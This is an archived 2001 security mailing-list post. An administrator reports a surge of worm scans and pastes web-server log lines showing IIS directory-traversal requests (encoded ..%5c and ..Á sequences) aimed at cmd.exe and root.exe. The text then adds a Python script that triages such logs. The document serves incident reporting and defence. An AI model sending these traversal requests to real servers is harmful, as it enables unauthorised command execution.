Security Incidents mailing list archives
massive cmd.exe and root.exe attempts
From: "Patrick Beam" <pbeam () agea com>
Date: Tue, 18 Sep 2001 12:05:55 -0500
I am as well being hit by this worm. Everything seems to be coming from the same class A 64.*. I have already seen 1500 plus scans to my web servers and that number is climbing rather fast. This seemed to suddenly pop up with little or no warning? In the past days I have seen a few scans here and there but nothing of this magnitude. I am wondering what suddenly changed to cause this type of outbreak?

2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 403 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 403 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:40 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:40 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401

Patrick Beam
Senior Systems Administrator
Agea Corp.
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
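For triaging log lines like the ones in the message above, the following is an added example and not part of the original post. It assumes the field order seen in those lines (date, time, client IP, user, server IP, port, method, URI stem, URI query, status); the function names and the last two sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Sample input: first two lines are taken from the post, the last two are constructed.
SAMPLE_LOG = """\
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:27:10 10.0.0.5 - xxx.xxx.xxx.xxx 80 GET /index.html - 200 -
"""

SHELL_RE = re.compile(r"/(cmd|root)\.exe$", re.IGNORECASE)

def normalize(stem, max_rounds=3):
    """Percent-decode repeatedly (catches double encoding) and unify slashes."""
    for _ in range(max_rounds):
        decoded = unquote(stem, encoding="latin-1")
        if decoded == stem:
            break
        stem = decoded
    return stem.replace("\\", "/")

def classify(line):
    """Return details for a cmd.exe/root.exe request, or None for anything else."""
    fields = line.split()
    if len(fields) < 10 or fields[0].startswith("#") or not fields[9].isdigit():
        return None
    ip, stem, status = fields[2], fields[7], int(fields[9])
    path = normalize(stem)
    if not SHELL_RE.search(path):
        return None
    return {"ip": ip, "path": path, "status": status,
            "traversal": "/../" in path,
            "served": 200 <= status < 300}  # 2xx: the server answered the request

def summarize(log_text):
    """Count probes per client IP and how many of them got a 2xx response."""
    per_ip = defaultdict(lambda: {"probes": 0, "served": 0})
    for line in log_text.splitlines():
        hit = classify(line)
        if hit:
            per_ip[hit["ip"]]["probes"] += 1
            per_ip[hit["ip"]]["served"] += int(hit["served"])
    return dict(per_ip)

if __name__ == "__main__":
    for ip, counts in summarize(SAMPLE_LOG).items():
        print(ip, counts)
```

Every request in the posted log was answered with 401 or 403; a source with a non-zero `served` count is the one to check on the host itself.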